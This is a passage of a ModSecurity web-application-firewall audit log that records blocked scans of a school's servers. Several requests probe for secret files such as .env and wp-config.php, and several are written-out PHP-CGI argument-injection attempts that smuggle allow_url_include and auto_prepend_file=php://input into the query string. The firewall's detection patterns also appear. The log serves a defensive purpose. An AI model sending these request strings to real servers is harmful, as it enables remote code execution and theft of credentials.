charset=iso-8859-1 --f07ddf78-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747258205111362 879 (- - -) Stopwatch2: 1747258205111362 879; combined=394, p1=352, p2=0, p3=0, p4=0, p5=41, sr=129, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f07ddf78-Z-- --a410462a-A-- [15/May/2025:04:57:20 +0700] aCURwEZPp_O9UFIYjNbqhgAAANQ 103.236.140.4 41586 103.236.140.4 8181 --a410462a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.22.121.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.22.121.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --a410462a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a410462a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747259840978236 786 (- - -) Stopwatch2: 1747259840978236 786; combined=315, p1=279, p2=0, p3=0, p4=0, p5=35, sr=111, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a410462a-Z-- --a7c1687d-A-- [15/May/2025:05:09:40 +0700] aCUUpO8rcsLSwEaopQIT4gAAAAM 103.236.140.4 43054 103.236.140.4 8181 --a7c1687d-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 160.20.104.81 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 160.20.104.81 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --a7c1687d-C-- --a7c1687d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7c1687d-E-- --a7c1687d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747260580205347 4843 (- - -) Stopwatch2: 1747260580205347 4843; combined=3280, p1=492, p2=2743, p3=0, p4=0, p5=45, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7c1687d-Z-- --32de9373-A-- [15/May/2025:06:33:58 +0700] aCUoZkZPp_O9UFIYjNbrpgAAAMQ 103.236.140.4 47056 103.236.140.4 8181 --32de9373-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 119.3.154.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 119.3.154.161 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --32de9373-C-- --32de9373-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --32de9373-E-- --32de9373-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747265638023370 4755 (- - -) Stopwatch2: 1747265638023370 4755; combined=3013, p1=461, p2=2512, p3=0, p4=0, p5=39, sr=78, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32de9373-Z-- --8ceb962a-A-- [15/May/2025:11:31:01 +0700] aCVuBUZPp_O9UFIYjNbxEQAAAMw 103.236.140.4 54258 103.236.140.4 8181 --8ceb962a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.22.201.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.22.201.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --8ceb962a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ceb962a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747283461664117 804 (- - -) Stopwatch2: 1747283461664117 804; combined=335, p1=295, p2=0, p3=0, p4=0, p5=40, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ceb962a-Z-- --8762331d-A-- [15/May/2025:12:13:33 +0700] aCV3_T0MuKCmW-Q80KvlvQAAAFU 103.236.140.4 55346 103.236.140.4 8181 --8762331d-B-- GET /wp-config.php HTTP/1.1 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 165.232.164.254 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 165.232.164.254 Accept-Encoding: gzip X-Varnish: 146829124 --8762331d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8762331d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747286013372010 775 (- - -) Stopwatch2: 1747286013372010 775; combined=312, p1=279, p2=0, p3=0, p4=0, p5=33, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8762331d-Z-- --6fcce401-A-- [15/May/2025:12:13:33 +0700] aCV3_UZPp_O9UFIYjNbx_QAAAM0 103.236.140.4 55578 103.236.140.4 8181 --6fcce401-B-- GET /wp-config.php HTTP/1.1 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 165.232.164.254 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 165.232.164.254 Accept-Encoding: gzip X-Varnish: 147521796 --6fcce401-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6fcce401-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747286013388657 729 (- - -) Stopwatch2: 1747286013388657 729; combined=290, p1=257, p2=0, p3=0, p4=0, p5=33, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6fcce401-Z-- --994c5524-A-- [15/May/2025:12:14:49 +0700] aCV4SX5oxhgjPv2ZXtkkBQAAAII 103.236.140.4 59768 103.236.140.4 8181 --994c5524-B-- GET /wp-config.php HTTP/1.0 Referer: www.google.com Host: up.smkn22jakarta.sch.id X-Real-IP: 165.232.164.254 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 165.232.164.254 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --994c5524-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --994c5524-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747286089479546 685 (- - -) Stopwatch2: 1747286089479546 685; combined=251, p1=219, p2=0, p3=0, p4=0, p5=32, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --994c5524-Z-- --49f3cd71-A-- [15/May/2025:12:14:49 +0700] aCV4SX5oxhgjPv2ZXtkkBgAAAIk 103.236.140.4 59770 103.236.140.4 8181 --49f3cd71-B-- GET /wp-config.php HTTP/1.0 Referer: www.google.com Host: up.smkn22jakarta.sch.id X-Real-IP: 165.232.164.254 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 165.232.164.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --49f3cd71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --49f3cd71-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747286089506502 673 (- - -) Stopwatch2: 1747286089506502 673; combined=252, p1=218, p2=0, p3=0, p4=0, p5=33, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --49f3cd71-Z-- --2093d76c-A-- [15/May/2025:12:16:38 +0700] aCV4tkZPp_O9UFIYjNb1oQAAAM8 103.236.140.4 33212 103.236.140.4 8181 --2093d76c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.234 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.234 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0) Accept-Charset: utf-8 --2093d76c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2093d76c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747286198375399 811 (- - -) Stopwatch2: 1747286198375399 811; combined=319, p1=279, p2=0, p3=0, p4=0, p5=40, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2093d76c-Z-- --368ed031-A-- [15/May/2025:12:47:41 +0700] aCV__UZPp_O9UFIYjNb1rQAAAMw 103.236.140.4 33350 103.236.140.4 8181 --368ed031-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.136 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.136 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --368ed031-C-- --368ed031-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --368ed031-E-- --368ed031-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747288061064650 4340 (- - -) Stopwatch2: 1747288061064650 4340; combined=2213, p1=534, p2=1639, p3=0, p4=0, p5=40, sr=79, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --368ed031-Z-- --1133d602-A-- [15/May/2025:15:14:28 +0700] aCWiZD0MuKCmW-Q80KsV3wAAAFE 103.236.140.4 45664 103.236.140.4 8181 --1133d602-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.209 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0 Accept-Charset: utf-8 --1133d602-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1133d602-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747296868722551 787 (- - -) Stopwatch2: 1747296868722551 787; combined=339, p1=296, p2=0, p3=0, p4=0, p5=43, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1133d602-Z-- --1c50a37b-A-- [15/May/2025:16:53:19 +0700] aCW5jz0MuKCmW-Q80Kt2VQAAAEg 103.236.140.4 51916 103.236.140.4 8181 --1c50a37b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.22.201.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.22.201.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --1c50a37b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c50a37b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747302799988122 803 (- - -) Stopwatch2: 1747302799988122 803; combined=350, p1=309, p2=0, p3=0, p4=0, p5=41, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c50a37b-Z-- --baf9796b-A-- [15/May/2025:19:15:41 +0700] aCXa7e8rcsLSwEaopQLitgAAABg 103.236.140.4 47450 103.236.140.4 8181 --baf9796b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.57 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.57 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --baf9796b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --baf9796b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747311341153867 829 (- - -) Stopwatch2: 1747311341153867 829; combined=353, p1=310, p2=0, p3=0, p4=0, p5=43, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --baf9796b-Z-- --461ee907-A-- [15/May/2025:20:30:18 +0700] aCXsaj0MuKCmW-Q80Ku0agAAAEU 103.236.140.4 49240 103.236.140.4 8181 --461ee907-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 196.117.106.221 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.117.106.221 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept: */* --461ee907-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --461ee907-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747315818982620 764 (- - -) Stopwatch2: 1747315818982620 764; combined=303, p1=263, p2=0, p3=0, p4=0, p5=40, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --461ee907-Z-- --e3010048-A-- [15/May/2025:20:30:20 +0700] aCXsbH5oxhgjPv2ZXtnYLgAAAIc 103.236.140.4 49242 103.236.140.4 8181 --e3010048-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 196.117.106.221 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.117.106.221 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept: */* --e3010048-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e3010048-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747315820370159 976 (- - -) Stopwatch2: 1747315820370159 976; combined=353, p1=311, p2=0, p3=0, p4=0, p5=42, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e3010048-Z-- --333dbc73-A-- [15/May/2025:20:30:21 +0700] aCXsbT0MuKCmW-Q80Ku0awAAAFI 103.236.140.4 49246 103.236.140.4 8181 --333dbc73-B-- GET /.env.save HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 196.117.106.221 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.117.106.221 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept: */* --333dbc73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --333dbc73-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747315821038480 746 (- - -) Stopwatch2: 1747315821038480 746; combined=283, p1=248, p2=0, p3=0, p4=0, p5=35, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --333dbc73-Z-- --8c1f8222-A-- [15/May/2025:20:30:22 +0700] aCXsbu8rcsLSwEaopQLjfwAAAAk 103.236.140.4 49250 103.236.140.4 8181 --8c1f8222-B-- GET /.env.save HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 196.117.106.221 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.117.106.221 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept: */* --8c1f8222-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c1f8222-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747315822426264 688 (- - -) Stopwatch2: 1747315822426264 688; combined=274, p1=242, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c1f8222-Z-- --aae6147c-A-- [15/May/2025:20:30:23 +0700] aCXsb0ZPp_O9UFIYjNbB1AAAAM4 103.236.140.4 49252 103.236.140.4 8181 --aae6147c-B-- GET /.env.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 196.117.106.221 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.117.106.221 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 